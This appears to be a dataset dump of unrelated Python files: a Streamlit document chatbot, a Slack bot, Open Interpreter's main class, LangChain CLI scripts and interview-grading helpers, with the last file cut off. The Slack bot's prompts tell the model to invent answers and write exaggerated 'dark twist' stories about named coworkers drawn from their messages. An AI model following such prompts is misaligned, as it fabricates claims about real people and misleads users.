vectordb.persist()
vectordb = None
except:
if pdf is not None:
pdf_reader = PdfReader(pdf)
# st.write(pdf_reader)
text = ""
for page in pdf_reader.pages:
text += page.extract_text()
# st.write(text)
# len(pdf_documents)
pdf_text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=200)
# st.write(pdf_text_splitter)
pdf_texts = pdf_text_splitter.split_text(text=text)
len(pdf_texts)
# st.write(pdf_splits)
persist_directory = "./vectorstores/db/"
pdf_embeddings = GPT4AllEmbeddings()
pdf_vectordb = Chroma.from_texts(pdf_texts, embedding=pdf_embeddings, persist_directory=persist_directory)
pdf_vectordb.persist()
pdf_vectordb = None
# Sidebar Contents
with st.sidebar:
st.sidebar.title('ANTLATT.com')
st.sidebar.header('Add More Data to the Database')
##SIDEBAR PDF INPUT
pdf = st.sidebar.file_uploader("Upload a PDF", type="pdf", disabled=False)
###SIDEBAR URL INPUT
url = st.sidebar.text_input('Enter a URL', placeholder="enter url here", disabled=False)
with st.form('myform2', clear_on_submit=True):
persist_directory = "/vectorstores/db"
submitted = st.form_submit_button('Submit', disabled=not(url or pdf))
if submitted:
with st.spinner('Creating VectorStore, Saving to Disk...'):
db_lookup()
with st.success('Done!'):
st.write('VectorStore Created and Saved to Disk')
st.markdown('''
## About
This is an LLM-powered chatbot built using:
- [Streamlit](https://streamlit.io)
- [Langchain](https://python.langchain.com)
- [Ollama](https://ollama.com)
- [Mistral-7b](https://huggingface.co/illuin/mistral-7b)
''')
add_vertical_space(5)
st.write('Made by [antlatt](https://www.antlatt.com)')
### MAIN PAGE CONTENTS
st.title('ANTLATT.com')
st.header('Chat with Your Documents')
### Chat App
user_prompt = st.chat_input('Enter your message:', key="user_prompt")
if user_prompt:
st.write(f'You: {user_prompt}'
)
# Initialize chat history
if "messages" not in st.session_state:
st.session_state.messages = []
# Display chat messages from history on app rerun
for message in st.session_state.messages:
with st.chat_message(message["role"]):
st.markdown(message["content"])
# React to user input
if prompt := st.chat_input("Send a Chat Message to the AI Assistant"):
st.session_state.messages.append({"role": "user", "content": prompt})
with st.chat_message("user"):
st.markdown(prompt)
with st.chat_message("assistant"):
persist_directory = "./vectorstores/db/"
embeddings = GPT4AllEmbeddings()
vectordb = Chroma(persist_directory=persist_directory, embedding_function=embeddings)
retriever = vectordb.as_retriever()
docs = retriever.get_relevant_documents(prompt)
len(docs)
retriever = vectordb.as_retriever(search_kwags={"k": 3})
retriever.search_type = "similarity"
retriever.search_kwargs = {"k": 3}
qachain = RetrievalQA.from_chain_type(ollama, chain_type="stuff", retriever=retriever, return_source_documents=False)
### ChatOllama_Agent
llm = ChatOllama(base_url='http://192.168.1.81:11434', model='dolphin2.2-mistral', temperature=0.1, streaming=True)
tools = [
Tool(
name="chat",
func=ChatOllama,
description="Useful for chatting with the AI in general conversation."
),
Tool(
name="ddg_search",
func=DuckDuckGoSearchRun,
description="A search engine. Useful for when you need to answer questions about current events. Input should be a search query."
),
Tool(
name="wikipedia_search",
func=WikipediaQueryRun(api_wrapper=WikipediaAPIWrapper()),
description="An online encyclopedia. Search Wikipedia for a query"
),
Tool(
name="vectorstore_search",
func=qachain,
description="Search the local Database for a query"
)
]
ollama_agent = initialize_agent(tools,
llm,
agent=AgentType.CHAT_ZERO_SHOT_REACT_DESCRIPTION,
verbose=True,
handle_parsing_errors=True)
message_placeholder = st.empty()
full_response = ollama_agent.run(prompt)
message_placeholder.markdown(full_response)
st.session_state.messages.append({"role": "assistant", "content": full_response})
### Chat App End
#if __name__ == "__main__":
# main() | [
"user_prompt",
"Enter your message:"
] |
2024-01-10 | scottbonline/clapvontrap | slackbot.py | import os
from openai import OpenAI
from slack_bolt.adapter.socket_mode import SocketModeHandler
from slack_sdk import WebClient
from slack_bolt import App
import logging
#from langchain.chains import LLMChain
#from langchain.prompts import PromptTemplate
from langchain.chat_models import ChatOpenAI
from langchain.llms import OpenAI as lcOpenAI
from langchain.schema import SystemMessage, HumanMessage, AIMessage
import random
from langchain.vectorstores import Chroma
from langchain.embeddings.sentence_transformer import SentenceTransformerEmbeddings
import chromadb
#from chromadb.config import Settings
import re
import time
import spacy
import json
from agent_ability import ability_check
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(levelname)s - [%(funcName)s] - %(message)s",
)
SLACK_BOT_TOKEN = os.getenv('SLACK_BOT_TOKEN')
SLACK_APP_TOKEN = os.getenv('SLACK_APP_TOKEN')
# openai auth token is pulled from system env OPENAI_API_KEY
# init openai using langchain
chat = ChatOpenAI(
# openai_api_key=os.environ["OPENAI_API_KEY"],
# openai_api_base = "http://192.168.1.59:1234/v1",
temperature=0.7,
# model='gpt-3.5-turbo'
model="gpt-4-1106-preview"
# model = "local-model"
)
llm = lcOpenAI()
openai_client = OpenAI()
# init Chroma
chroma_client = chromadb.HttpClient(host="localhost", port=8000)
# chroma_collection = chroma_client.get_or_create_collection("20char")
chroma_collection = chroma_client.get_collection("10word")
# init Slack Event API & Web API
app = App(token=SLACK_BOT_TOKEN)
client = WebClient(SLACK_BOT_TOKEN)
friendly_ai = """You are a friendly AI who is trained in analyzing json to be able to summarize
the contents in relation to what as user is asking. Pay careful attention to who said things, and what
sentiment they used. If the answer is not clear, make up something creative based on the context"""
default_ai_1 = """Imagine you're asked a hypothetical or personality based question about how a certain person
would react in a certain scenario, like being on a deserted island, or are they more positive or negative
about life. Keeping in mind that person's messages based from the provided context, craft a creative,
humorous response that playfully exaggerates their traits. You must always give an answer. Do not complain
about needing additional context"""
generic_ai = """You are an unhelpful AI that doesn't like to be disturbed with questions. If the question doesn't have an answer, express your displeasure."""
default_ai = """You are a creative storyteller who performs the following tasks:
Task #1:
Summarize in less than 100 words everything in the "Context" section
Task #2:
Imagine you're asked a hypothetical or personality based question about how a certain person
would react in a certain scenario, like being on a deserted island, or are they more positive or negative
about life. Keeping in mind that person's messages based from the provided context, craft a creative,
response that exaggerates their traits. You must always give an answer. Do not complain
about needing additional context. Do not mention a desert island in your response.
Your response should be formatted as follows:
Summary: <summary of context>
Analysis: <creative story with a dark twist based on the question>
"""
messages = [
SystemMessage(content=default_ai),
]
messages_generic = [
SystemMessage(content=generic_ai),
]
def valid_users():
file_path = "usermap.json"
with open(file_path, "r") as file:
data = json.load(file)
values_list = list(data.values())
values_list = [name.lower() for name in values_list]
return values_list
def query_chroma(query, subject=None):
logging.info(f"Query: {query}, Sender: {subject}")
if subject:
# FIX can clean this upper case nonsense up on next import of RAG
if not subject[0].isupper():
subject = subject[0].upper() + subject[1:]
c_results = chroma_collection.query(
query_texts=[query],
n_results=10,
# use this to search metadata keys
where={"sender": subject},
# where_document={"$contains":"search_string"}
)
else:
c_results = chroma_collection.query(
query_texts=[query],
n_results=10,
# use this to search metadata keys
# where={"sender": sender},
# where_document={"$contains":"search_string"}
)
# clean results
raw_results = c_results.get("metadatas") + c_results.get("documents")
results = {}
for i in range(len(raw_results[1])):
results[i] = {"metadata": raw_results[0][i], "message": raw_results[1][i]}
return results
def augment_prompt(query: str, sender=None):
# get top X results from Chroma
if sender:
logging.info(f"Subject Detected")
source_knowledge = query_chroma(query, sender)
logging.info(f"Source Knowledge:: {source_knowledge}")
else:
logging.info(f"Subject NOT Detected")
source_knowledge = query_chroma(query)
logging.info(f"Source Knowledge:: {source_knowledge}")
# feed into an augmented prompt
augmented_prompt = f"""{default_ai}
Context:
{source_knowledge}
"""
return augmented_prompt
def image_create(context_from_user):
logging.info(f"Generate image using:: {context_from_user}")
aiimage = openai_client.images.generate(
prompt=context_from_user,
model="dall-e-3",
n=1,
size="1024x1024",
)
return aiimage
def get_subject(query):
if not query[0].isupper():
logging.info(f"add uppercase: {query}")
context_from_user = query[0].upper() + query[1:]
logging.info("Start Subject Detection")
# Load the English model
nlp = spacy.load("en_core_web_sm")
# Process the sentence
doc = nlp(query)
# generate valid users
valid_names = valid_users()
# Find the subject
for token in doc:
# 'nsubj' stands for nominal subject; 'nsubjpass' stands for passive nominal subject
logging.info(f"Subject Details:: {token.text, token.dep_}")
if token.dep_ in ("nsubj", "nsubjpass", "npadvmod", "dobj"):
if token.text.lower() in valid_names:
logging.info(f"Subject Detected:: {token.text, token.dep_}")
return token.text
logging.info(f"Subject NOT Detected")
return None
def chat_response(context_from_user):
# formatting to help with NLP
if not context_from_user[0].isupper():
context_from_user = context_from_user[0].upper() + context_from_user[1:]
logging.info(f"add uppercase: {context_from_user}")
subject = get_subject(context_from_user)
if not subject:
prompt = [
SystemMessage(content=generic_ai),
HumanMessage(content=f"Question: {context_from_user}"),
]
else:
prompt = [
SystemMessage(content=augment_prompt(context_from_user, subject)),
HumanMessage(content=f"Question: {context_from_user}"),
]
logging.info(f"Sending finalized prompt:: {prompt}")
ai_response = chat(prompt)
logging.info(f"Recived response: {ai_response}")
return ai_response
# This gets activated when the bot is tagged in a channel
@app.event("app_mention")
def handle_message_events(body):
context_from_user = str(body["event"]["text"]).split("> ")[1]
# Let thre user know that we are busy with the request
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=f"beep, boop: " + context_from_user,
)
logging.info(f"Check Query for Image Request:: {context_from_user}")
if context_from_user.startswith("i:"):
logging.info("Image Search Detected")
ai_response = image_create(context_from_user)
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=ai_response.data[0].model_dump()["url"],
)
elif context_from_user.startswith("p:"):
logging.info("BETA Personality Detected")
ai_response = ability_check(context_from_user)
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=ai_response,
)
else:
logging.info("No Image Search Detetected")
ai_response = chat_response(context_from_user)
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=ai_response.content,
)
# this listens to all messages in all channels
@app.event("message")
def handle_message_events(body, logger):
if "text" in body["event"]:
context_from_user = str(body["event"]["text"])
chance = random.randint(1, 30)
length = len(context_from_user)
logging.info(
f"Random response check:: Context: {context_from_user}, Chance:{chance}, Length:{length}"
)
if (
chance > 25
and length > 8
and context_from_user[-1] == "?"
and "<@U04PUPJ04R0>" not in context_from_user
):
logging.info("Random response activated")
ai_response = chat_response(context_from_user)
response = client.chat_postMessage(
channel=body["event"]["channel"],
# thread_ts=body["event"]["event_ts"],
text=ai_response.content,
)
else:
logger.info(f"No 'text' key found:: {body}")
if __name__ == "__main__":
try:
# start slack handler
SocketModeHandler(app, SLACK_APP_TOKEN).start()
except Exception as e:
print(e)
| [
"Question: PLACEHOLDER",
"PLACEHOLDER\n\n Context:\n PLACEHOLDER\n\n "
] |
2024-01-10 | redsos/open-interpreter | interpreter~interpreter.py | from .cli import cli
from .utils import merge_deltas, parse_partial_json
from .message_block import MessageBlock
from .code_block import CodeBlock
from .code_interpreter import CodeInterpreter
from .llama_2 import get_llama_2_instance
import os
import time
import platform
import openai
import getpass
import requests
import readline
import urllib.parse
import tokentrim as tt
from rich import print
from rich.markdown import Markdown
from rich.rule import Rule
# Function schema for gpt-4
function_schema = {
"name": "run_code",
"description":
"Executes code in various programming languages and returns the output.",
"parameters": {
"type": "object",
"properties": {
"language": {
"type": "string",
"description":
"The programming language.",
"enum": ["python", "shell", "applescript", "javascript", "html"]
},
"code": {
"type": "string",
"description": "The code to execute."
}
},
"required": ["language", "code"]
},
}
# Message for when users don't have an OpenAI API key.
missing_api_key_message = """> OpenAI API key not found
To use `GPT-4` (recommended) please provide an OpenAI API key.
To use `Code-Llama` (free but less capable) press `enter`.
"""
confirm_mode_message = """
**Open Interpreter** will require approval before running code. Use `interpreter -y` to bypass this.
Press `CTRL-C` to exit.
"""
class Interpreter:
def __init__(self):
self.messages = []
self.temperature = 0.001
self.api_key = None
self.auto_run = False
self.local = False
self.model = "gpt-4"
self.debug_mode = False
# Get default system message
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'system_message.txt'), 'r') as f:
self.system_message = f.read().strip()
# Store Code Interpreter instances for each language
self.code_interpreters = {}
# No active block to start
# (blocks are visual representation of messages on the terminal)
self.active_block = None
# Note: While Open Interpreter can use Llama, we will prioritize gpt-4.
# gpt-4 is faster, smarter, can call functions, and is all-around easier to use.
# This makes gpt-4 better aligned with Open Interpreters priority to be easy to use.
self.llama_instance = None
def cli(self):
# The cli takes the current instance of Interpreter,
# modifies it according to command line flags, then runs chat.
cli(self)
def get_info_for_system_message(self):
"""
Gets relevent information for the system message.
"""
info = ""
# Add user info
username = getpass.getuser()
current_working_directory = os.getcwd()
operating_system = platform.system()
info += f"\n\n[User Info]\nName: {username}\nCWD: {current_working_directory}\nOS: {operating_system}"
if not self.local:
# Open Procedures is an open-source database of tiny, structured coding tutorials.
# We can query it semantically and append relevant tutorials/procedures to our system message:
# Encode and truncate the last two messages
query = str(self.messages[-2:])
query = urllib.parse.quote(query)
query = query[-2000:]
# Use them to query Open Procedures
url = f"https://open-procedures.replit.app/search/?query={query}"
try:
relevant_procedures = requests.get(url).json()["procedures"]
info += "\n\n# Recommended Procedures\n" + "\n---\n".join(relevant_procedures) + "\nIn your plan, include steps and, if present, **EXACT CODE SNIPPETS** (especially for depracation notices, **WRITE THEM INTO YOUR PLAN -- underneath each numbered step** as they will VANISH once you execute your first line of code, so WRITE THEM DOWN NOW if you need them) from the above procedures if they are relevant to the task. Again, include **VERBATIM CODE SNIPPETS** from the procedures above if they are relevent to the task **directly in your plan.**"
except:
# For someone, this failed for a super secure SSL reason.
# Since it's not stricly necessary, let's worry about that another day. Should probably log this somehow though.
pass
elif self.local:
# Tell Code-Llama how to run code.
info += "\n\nTo run code, simply write a fenced code block (i.e ```python or ```shell) in markdown. When you close it with ```, it will be run. You'll then be given its output."
# We make references in system_message.txt to the "function" it can call, "run_code".
# But functions are not supported by Code-Llama, so:
info = info.replace("run_code", "a markdown code block")
return info
def reset(self):
self.messages = []
self.code_interpreters = {}
def load(self, messages):
self.messages = messages
def chat(self, message=None, return_messages=False):
# Connect to an LLM (an large language model)
if not self.local:
# gpt-4
self.verify_api_key()
# ^ verify_api_key may set self.local to True, so we run this as an 'if', not 'elif':
if self.local:
# Code-Llama
if self.llama_instance == None:
# Find or install Code-Llama
try:
self.llama_instance = get_llama_2_instance()
except:
# If it didn't work, apologize and switch to GPT-4
print(">Failed to install Code-LLama.")
print("\n**We have likely not built the proper `Code-Llama` support for your system.**")
print("\n(Running language models locally is a difficult task! If you have insight into the best way to implement this across platforms/architectures, please join the Open Interpreter community Discord and consider contributing the project's development.)")
print("\nPlease press enter to switch to `GPT-4` (recommended).")
input()
# Switch to GPT-4
self.local = False
self.verify_api_key()
# Display welcome message
welcome_message = ""
if self.debug_mode:
welcome_message += "> Entered debug mode"
# If self.local, we actually don't use self.model
# (self.auto_run is like advanced usage, we display no messages)
if not self.local and not self.auto_run:
welcome_message += f"\n> Model set to `{self.model.upper()}`\n\n**Tip:** To run locally, use `interpreter --local`"
if self.local:
welcome_message += f"\n> Model set to `Code-Llama`"
# If not auto_run, tell the user we'll ask permission to run code
# We also tell them here how to exit Open Interpreter
if not self.auto_run:
welcome_message += "\n\n" + confirm_mode_message
welcome_message = welcome_message.strip()
# Print welcome message with newlines on either side (aesthetic choice)
# unless we're starting with a blockquote (aesthetic choice)
if welcome_message != "":
if welcome_message.startswith(">"):
print(Markdown(welcome_message), '')
else:
print('', Markdown(welcome_message), '')
# Check if `message` was passed in by user
if message:
# If it was, we respond non-interactivley
self.messages.append({"role": "user", "content": message})
self.respond()
else:
# If it wasn't, we start an interactive chat
while True:
try:
user_input = input("> ").strip()
except EOFError:
break
except KeyboardInterrupt:
print() # Aesthetic choice
break
# Use `readline` to let users up-arrow to previous user messages,
# which is a common behavior in terminals.
readline.add_history(user_input)
# Add the user message to self.messages
self.messages.append({"role": "user", "content": user_input})
# Let the user turn on debug mode mid-chat
if user_input == "%debug":
print('', Markdown("> Entered debug mode"), '')
print(self.messages)
self.debug_mode = True
continue
# Respond, but gracefully handle CTRL-C / KeyboardInterrupt
try:
self.respond()
except KeyboardInterrupt:
pass
finally:
# Always end the active block. Multiple Live displays = issues
self.end_active_block()
if return_messages:
return self.messages
def verify_api_key(self):
"""
Makes sure we have an OPENAI_API_KEY.
"""
if self.api_key == None:
if 'OPENAI_API_KEY' in os.environ:
self.api_key = os.environ['OPENAI_API_KEY']
else:
# This is probably their first time here!
print('', Markdown("**Welcome to Open Interpreter.**"), '')
time.sleep(1)
print(Rule(style="white"))
print(Markdown(missing_api_key_message), '', Rule(style="white"), '')
response = input("OpenAI API key: ")
if response == "":
# User pressed `enter`, requesting Code-Llama
self.local = True
print(Markdown("> Switching to `Code-Llama`...\n\n**Tip:** Run `interpreter --local` to automatically use `Code-Llama`."), '')
time.sleep(2)
print(Rule(style="white"))
return
else:
self.api_key = response
print('', Markdown("**Tip:** To save this key for later, run `export OPENAI_API_KEY=your_api_key` on Mac/Linux or `setx OPENAI_API_KEY your_api_key` on Windows."), '')
time.sleep(2)
print(Rule(style="white"))
openai.api_key = self.api_key
def end_active_block(self):
if self.active_block:
self.active_block.end()
self.active_block = None
def respond(self):
# Add relevant info to system_message
# (e.g. current working directory, username, os, etc.)
info = self.get_info_for_system_message()
system_message = self.system_message + "\n\n" + info
if self.local:
# Model determines how much we'll trim the messages list to get it under the context limit
# So for Code-Llama, we'll use "gpt-3.5-turbo" which (i think?) has the same context window as Code-Llama
self.model = "gpt-3.5-turbo"
# In the future lets make --model {model} just work / include llama
messages = tt.trim(self.messages, self.model, system_message=system_message)
if self.debug_mode:
print("\n", "Sending `messages` to LLM:", "\n")
print(messages)
print()
# Make LLM call
if not self.local:
# gpt-4
response = openai.ChatCompletion.create(
model=self.model,
messages=messages,
functions=[function_schema],
stream=True,
temperature=self.temperature,
)
elif self.local:
# Code-Llama
# Turn function messages -> system messages for llama compatability
messages = self.messages
for message in messages:
if message['role'] == 'function':
message['role'] = 'system'
response = self.llama_instance.create_chat_completion(
messages=messages,
stream=True,
temperature=self.temperature,
)
# Initialize message, function call trackers, and active block
self.messages.append({})
in_function_call = False
llama_function_call_finished = False
self.active_block = None
for chunk in response:
delta = chunk["choices"][0]["delta"]
# Accumulate deltas into the last message in messages
self.messages[-1] = merge_deltas(self.messages[-1], delta)
# Check if we're in a function call
if not self.local:
condition = "function_call" in self.messages[-1]
elif self.local:
# Since Code-Llama can't call functions, we just check if we're in a code block.
# This simply returns true if the number of "```" in the message is odd.
if "content" in self.messages[-1]:
condition = self.messages[-1]["content"].count("```") % 2 == 1
else:
# If it hasn't made "content" yet, we're certainly not in a function call.
condition = False
if condition:
# We are in a function call.
# Check if we just entered a function call
if in_function_call == False:
# If so, end the last block,
self.end_active_block()
# Print newline if it was just a code block or user message
# (this just looks nice)
last_role = self.messages[-2]["role"]
if last_role == "user" or last_role == "function":
print()
# then create a new code block
self.active_block = CodeBlock()
# Remember we're in a function_call
in_function_call = True
# Now let's parse the function's arguments:
if not self.local:
# gpt-4
# Parse arguments and save to parsed_arguments, under function_call
if "arguments" in self.messages[-1]["function_call"]:
arguments = self.messages[-1]["function_call"]["arguments"]
new_parsed_arguments = parse_partial_json(arguments)
if new_parsed_arguments:
# Only overwrite what we have if it's not None (which means it failed to parse)
self.messages[-1]["function_call"][
"parsed_arguments"] = new_parsed_arguments
elif self.local:
# Code-Llama
# Parse current code block and save to parsed_arguments, under function_call
if "content" in self.messages[-1]:
current_code_block = self.messages[-1]["content"].split("```")[-1]
language = current_code_block.split("\n")[0]
# Default to python if it just did a "```" then continued writing code
if language == "" and "\n" in current_code_block:
language = "python"
code = current_code_block.split("\n")[1:]
arguments = {"language": language, "code": code}
# Code-Llama won't make a "function_call" property for us to store this under, so:
if "function_call" not in self.messages[-1]:
self.messages[-1]["function_call"] = {}
self.messages[-1]["function_call"]["parsed_arguments"] = arguments
else:
# We are not in a function call.
# Check if we just left a function call
if in_function_call == True:
if self.local:
# This is the same as when gpt-4 gives finish_reason as function_call.
# We have just finished a code block, so now we should run it.
llama_function_call_finished = True
# Remember we're not in a function_call
in_function_call = False
# If there's no active block,
if self.active_block == None:
# Create a message block
self.active_block = MessageBlock()
# Update active_block
self.active_block.update_from_message(self.messages[-1])
# Check if we're finished
if chunk["choices"][0]["finish_reason"] or llama_function_call_finished:
if chunk["choices"][
0]["finish_reason"] == "function_call" or llama_function_call_finished:
# Time to call the function!
# (Because this is Open Interpreter, we only have one function.)
if self.debug_mode:
print("Running function:")
print(self.messages[-1])
print("---")
# Ask for user confirmation to run code
if self.auto_run == False:
# End the active block so you can run input() below it
# Save language and code so we can create a new block in a moment
self.active_block.end()
language = self.active_block.language
code = self.active_block.code
# Prompt user
response = input(" Would you like to run this code? (y/n)\n\n ")
print("") # <- Aesthetic choice
if response.strip().lower() == "y":
# Create a new, identical block where the code will actually be run
self.active_block = CodeBlock()
self.active_block.language = language
self.active_block.code = code
else:
# User declined to run code.
self.active_block.end()
self.messages.append({
"role":
"function",
"name":
"run_code",
"content":
"User decided not to run this code."
})
return
# If we couldn't parse its arguments, we need to try again.
if "parsed_arguments" not in self.messages[-1]["function_call"]:
print("> Function call could not be parsed.\n\nPlease open an issue on Github (openinterpreter.com, click Github) and paste the following:")
print("\n", self.messages[-1]["function_call"], "\n")
time.sleep(2)
print("Informing the language model and continuing...")
# Reiterate what we need to the language model:
self.messages.append({
"role": "function",
"name": "run_code",
"content": """Your function call could not be parsed. Please use ONLY the `run_code` function, which takes two parameters: `code` and `language`. Your response should be formatted as a JSON."""
})
# Go around again
self.respond()
return
# Create or retrieve a Code Interpreter for this language
language = self.messages[-1]["function_call"]["parsed_arguments"][
"language"]
if language not in self.code_interpreters:
self.code_interpreters[language] = CodeInterpreter(language, self.debug_mode)
code_interpreter = self.code_interpreters[language]
# Let this Code Interpreter control the active_block
code_interpreter.active_block = self.active_block
code_interpreter.run()
# End the active_block
self.active_block.end()
# Append the output to messages
# Explicitly tell it if there was no output (sometimes "" = hallucinates output)
self.messages.append({
"role": "function",
"name": "run_code",
"content": self.active_block.output if self.active_block.output else "No output"
})
# Go around again
self.respond()
if chunk["choices"][0]["finish_reason"] != "function_call":
# Done!
# Code Llama likes to output "###" at the end of every message for some reason
if self.local and "content" in self.messages[-1]:
self.messages[-1]["content"] = self.messages[-1]["content"].strip().rstrip("#")
self.active_block.update_from_message(self.messages[-1])
time.sleep(0.1)
self.active_block.end()
return | [
"User decided not to run this code.",
"No output",
"Your function call could not be parsed. Please use ONLY the `run_code` function, which takes two parameters: `code` and `language`. Your response should be formatted as a JSON."
] |
2024-01-10 | alejandro-ao/chagpt-cli-python | main_entity.py | from dotenv import load_dotenv
import os
from langchain.chat_models import ChatOpenAI
from langchain.chains import ConversationChain
from langchain.memory import ConversationEntityMemory
from langchain.memory.prompt import ENTITY_MEMORY_CONVERSATION_TEMPLATE
def main():
load_dotenv()
# test our api key
if os.getenv("OPENAI_API_KEY") is None or os.getenv("OPENAI_API_KEY") == "":
print("OPENAI_API_KEY is not set. Please add your key to .env")
exit(1)
else:
print("API key set.")
llm = ChatOpenAI()
conversation = ConversationChain(
llm=llm,
memory=ConversationEntityMemory(llm=llm),
prompt=ENTITY_MEMORY_CONVERSATION_TEMPLATE,
verbose=False
)
print("Hello, I am ChatGPT CLI!")
while True:
user_input = input("> ")
ai_response = conversation.predict(input=user_input)
print("\nAssistant:\n", ai_response)
if __name__ == '__main__':
main()
| [] |
2024-01-10 | alejandro-ao/chagpt-cli-python | main_buffer.py | from dotenv import load_dotenv
import os
from langchain.memory import ConversationBufferMemory
from langchain.chains import ConversationChain
from langchain.chat_models import ChatOpenAI
def main():
load_dotenv()
# Load the OpenAI API key from the environment variable
if os.getenv("OPENAI_API_KEY") is None or os.getenv("OPENAI_API_KEY") == "":
print("OPENAI_API_KEY is not set")
exit(1)
else:
print("OPENAI_API_KEY is set")
llm = ChatOpenAI(temperature=0)
conversation = ConversationChain(
llm=llm, verbose=True, memory=ConversationBufferMemory())
print("Hello, I am ChatGPT CLI!")
while True:
user_input = input("> ")
ai_response = conversation.predict(input=user_input)
print("\nAssistant:\n", ai_response, "\n")
if __name__ == '__main__':
main()
| [] |
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | resume_details_questions~resume_details_to_questioning.py | # A function to get a set of question for performing an interview based on a person's Resume.
# The output of Resume_ContentExtractor.py in this repo is the ideal input for this function.
# The result of this function is a set of 10 questions.
from langchain.chat_models import ChatOpenAI
from langchain.prompts.prompt import PromptTemplate
from langchain.chains import LLMChain
from langchain.llms import OpenAI
import os
from dotenv import load_dotenv
load_dotenv()
# Add your own OPENAI_API_KEY for usage
def generate_questions(resume,role='',experience=''):
_PROMPT_TEMPLATE = """
this is the resume of user:
{resume_details}
here is the role he want to join in :
{role}
Based on the following experience:
{experience}
What are your interview questions for the given user resume and role he want to join in with that experience?
generate no of questions = {questions}!
"""
PROMPT = PromptTemplate(input_variables=["resume_details", "role", "experience",'questions'], template=_PROMPT_TEMPLATE)
llm1 = OpenAI(model_name="text-davinci-003", temperature=0)
chain = LLMChain(llm=llm1, prompt=PROMPT)
prompt = chain.predict_and_parse(resume_details= gen_text(resume),
role= role,
experience= experience,
questions=10)
return prompt.split('\n')
| [
"experience",
"resume_details",
"\n this is the resume of user:\n {resume_details}\n here is the role he want to join in :\n {role}\n Based on the following experience:\n {experience}\n What are your interview questions for the given user resume and role he want to join in with that experience?\n generate no of questions = {questions}!\n ",
"questions"
] |
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | Individual_grading~QuestionAnsGrading.py | import guidance
def indiQuesGrade(question, answer, role, exp):
# Initialize the evaluator model
evaluatorModel = guidance.llms.OpenAI('gpt-3.5-turbo')
# Define the evaluation system using the guidance template
evaluationSys = guidance('''
{{#system~}}
You are an expert system in Evaluating the answer provided by an interviewee in an interview.
Based on the question, answer given with information of Applying Role and Years of Experience, you can grade the answer on appropriate grading measures.
You are very skilled in grading the answers accurately and justifiably.
{{~/system}}
{{#user~}}
Now, you are provided with Interviewee's Question, his job role he applied to, and his years of experience he has with it.
You are now asked to generate suitable/appropriate grading measures for the question and grade his answer according to them.
The Question asked as follows:
{{question}}
The Role he applied to is as follows :
{{role}}
The years of experience he has in it is as follows :
{{experience}}
Now, generate the grading measures according to the above question, role and experience values.
The grading measures must be generated as a array elements with names as the grading rubrics. They are placed between two square brackets, separated by commas.
Do not output the grading measures yet.
{{~/user}}
{{#assistant~}}
{{gen 'grading_measures' temperature=0.7 max_tokens=150}}
{{~/assistant}}
{{#user~}}
Here's the answer provided by the interviewee in the interview :
{{answer}}
Now, perform the evaluation on the answer according to the generated grading measures.
Output the evaluation in a JSON Format with the grading measure as key and a dictionary of score and reason as value.
The score key contains a numerical measure depicting the answer against grading measure and the reason key contains text information
about why the answer was such given such numerical grade in the evaluation measure.
Add the key of overall score to the output JSON with a dictionary as it's value. The dictionary must have two keys, score, depicting the numerical measure
as a overall evaluations score, graded against a score of 5 and the other key as reason, showing a Justification Statement.
The output response must only contain a JSON File of evaluation. Do not output any additional information other than it.
{{~/user}}
{{#assistant~}}
{{gen 'evaluation' temperature=0.5 max_tokens=1500}}
{{~/assistant}}
''', llm = evaluatorModel)
# Call the evaluation system with the provided inputs
output = evaluationSys(question=question, role=role, experience=exp, answer=answer)
# Return the evaluation and grading measures
return output['evaluation'], output['grading_measures']
| [] |
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | Final_Grading~FinalGrad.py | import guidance
'''
This function represents the final evaluation of the interviewee. It takes the resume summary extracted using the `resume_details_extractor` code,
the role the interviewee applied for, and their experience level as input.
The ires parameter represents the CSV file containing the evaluation of each question and answer.
Based on these inputs, the function generates the interviewee's final evaluation
'''
def finalGradingPrompt(resume_summary, role, exp, ires):
# Initialize the guidance model
model = guidance.llms.OpenAI('gpt-3.5-turbo')
# Define the final grading prompt using the guidance template
finalRes = guidance('''
{{#system~}}
You are now the Final Decision Interview Result Grading Expert. You are provided with an Interview's evaluation details.
You need to evaluate the interview scenario and provide an overall score and set of Scope of Improvement statements for the interviewee.
{{~/system}}
{{#user~}}
The interview has been completed and the results of the interview will be provided to you. You need to evaluate the case and
provide an overall score of the interviewee's performance and suggestions for further improvements if required, based on the overall score.
Here's the Interviewee's Extracted JSON Summary:
{{resume_summary}}
{{~/user}}
{{#user~}}
The interviewee applied to the following role:
{{role}}
and has the following experience in that role:
{{exp}}
Here are the list of CSV records made from questions answered with grades under appropriate rubrics. These records also
contain the start and end timestamps of the interviewee answering the questions within a 2-minute time constraint.
Finally, the records contain a float value of the plagiarism score. We have set the threshold of 0.96 for an answer to be considered plagiarized.
The CSV records are as follows:
{{ires}}
{{~/user}}
{{#user~}}
Based on the above inputs of the interview, generate an overall performance score and scope of improvements based on it.
{{~/user}}
{{#assistant~}}
{{gen 'final_evaluation' temperature=0.5 max_tokens=1000}}
{{~/assistant}}
''', llm=model)
# Calling the final grading prompt with the provided inputs
res = finalRes(resume_summary=resume_summary, role=role, exp=exp, ires=ires)
# Return the final evaluation from the response
return res['final_evaluation']
| [] |
2024-01-10 | VVKMulukutla/JustASimpleInterviewGradingSystem | resume_details_questions~ResumeDetailsExtraction.py | from PyPDF2 import PdfReader
from langchain.chat_models import ChatOpenAI
from kor import create_extraction_chain, Object, Text
from langchain.prompts.prompt import PromptTemplate
from langchain.chains import LLMChain
from langchain.llms import OpenAI
import os
from dotenv import load_dotenv
#Add your own OPENAI_API_KEY to the Environment
load_dotenv()
def gen_text(pdf_file):
#Creates Readable Text Content from a PDF Resume File.
with open(pdf_file, "rb") as f:
reader = PdfReader(f)
num_pages = len(reader.pages)
text = ""
for page in reader.pages:
text += page.extract_text()
constraints=context_extracter(text)
return constraints
def context_extracter(text):
